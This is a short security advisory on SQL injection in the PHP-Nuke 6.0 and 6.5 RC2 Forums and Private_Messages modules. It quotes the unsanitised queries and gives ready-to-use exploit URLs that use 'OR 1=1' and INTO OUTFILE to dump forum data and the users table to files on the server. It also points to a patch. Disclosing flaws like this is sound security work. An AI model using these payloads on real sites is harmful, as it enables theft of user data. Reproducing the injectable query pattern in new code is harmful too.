Informations : °°°°°°°°°°°°°° Language : PHP Website : http://www.phpnuke.org Version : 6.0 & 6.5 RC2 Modules : Forums, Private_Messages Problem : SQL Injection PHP Code/Location : °°°°°°°°°°°°°°°°°°° /modules/Forums/viewtopic.php : ------------------------------------------------------------------------ $sql = "SELECT forum_type, forum_id, forum_pass, forum_name, forum_access, forum_moderator, forum_atch FROM ${prefix}_forums WHERE forum_id = '$forum'"; ------------------------------------------------------------------------ /modules/Forums/viewforum.php : ------------------------------------------------------------------------ $sql = "SELECT f.forum_id, f.forum_type, f.forum_pass, f.forum_name, u.uname, u.uid,m.forum_id,m.user_id FROM ${prefix}_forums f, ".$user_prefix."_users u, ${prefix}_forum_mods m WHERE f.forum_id = '$forum' AND m.forum_id = '$forum' AND m.user_id = u.uid"; ------------------------------------------------------------------------ /modules/Forums/reply.php : ------------------------------------------------------------------------ $sql = "SELECT forum_name, forum_access, forum_moderator, forum_atch FROM ${prefix}_forums WHERE (forum_id = '$forum')"; ------------------------------------------------------------------------ /modules/Forums/newtopic.php : ------------------------------------------------------------------------ $sql = "SELECT forum_type, forum_pass, forum_name, forum_access, forum_moderator, forum_atch FROM ${prefix}_forums WHERE (forum_id = '$forum')"; ------------------------------------------------------------------------ /modules/Forums/editpost.php : ------------------------------------------------------------------------$sql = "SELECT forum_name, forum_access, forum_moderator, forum_atch FROM ${prefix}_forums WHERE forum_id = '$forum'"; ------------------------------------------------------------------------ /modules/Private_Messages/reply.php : ------------------------------------------------------------------------ if ($reply || $send) { if ($uname != "") { $res = sql_num_rows(sql_query("select * from ".$user_prefix."_users where uname='$uname'", $dbi), $dbi); ------------------------------------------------------------------------ Exploits : °°°°°°°°°° - This will save forums informations into a txt file : http://[target]/modules.php?op=modload&name=Forums&file=viewtopic&topic=1&forum=1'%20INTO%20OUTFILE%20'[path/to/site]/vt.txt http://[target]/modules.php?op=modload&name=Forums&file=viewforum&forum='%20OR%201=1%20INTO%20OUTFILE%20'[/path]/vf.txt'/* http://[target]/modules.php?op=modload&name=Forums&file=reply&forum=1')%20INTO%20OUTFILE%20'[/path]/reply.txt'/* http://[target]/modules.php?op=modload&name=Forums&file=newtopic&forum=1')%20INTO%20OUTFILE%20'[/path]/newtopic.txt'/* http://[target]/modules.php?op=modload&name=Forums&file=editpost&forum=1'%20INTO%20OUTFILE%20'[/path]/editpost.txt etc... - This will save all users informations into a txt file : http://[target]/modules.php?name=Private_Messages&file=reply&send=1&uname='%20OR%201=1%20INTO%20OUTFILE%20'[/path]/users.txt Patch : °°°°°°° A patch can be found on http://www.phpsecure.info More Details In French : °°°°°°°°°°°°°°°°°°°°°°°° http://www.frog-man.org/tutos/PHP-Nuke6.0-Forums-Private_Messages.txt frog-m@n